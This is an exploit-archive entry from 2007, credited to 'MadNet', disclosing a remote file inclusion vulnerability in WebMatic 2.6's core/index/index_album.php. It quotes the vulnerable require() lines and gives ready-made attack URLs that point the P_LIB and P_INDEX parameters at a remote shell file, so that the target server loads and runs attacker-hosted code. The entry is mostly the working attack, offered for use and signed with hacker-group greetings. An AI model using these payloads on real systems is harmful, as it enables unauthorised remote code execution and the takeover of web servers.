[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
# Published : 2007-02-07
# Author : MadNet
# Previous Title : AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability
# Next Title : Advanced Poll <= 2.0.5-dev Remote Admin Session Generator Exploit
-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6
#Author : MadNet
#Contact : MadNet[at]Hackertr[Dot]org
#S.Page : www.valarsoft.com :)
--------------------------------------*******************-----------------------------------------------------------
Error1 : require($P_LIB."lib_album.php");
Error2 : require($P_INDEX."page_album.inc");
[[RFI]]
http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]
http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
-------------------------------------------------
Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
-- MadNet From Turkey & Cyber-Sabotger Orgeneral --
--Thanks Milw0rm
# www.Syue.com [2007-02-07]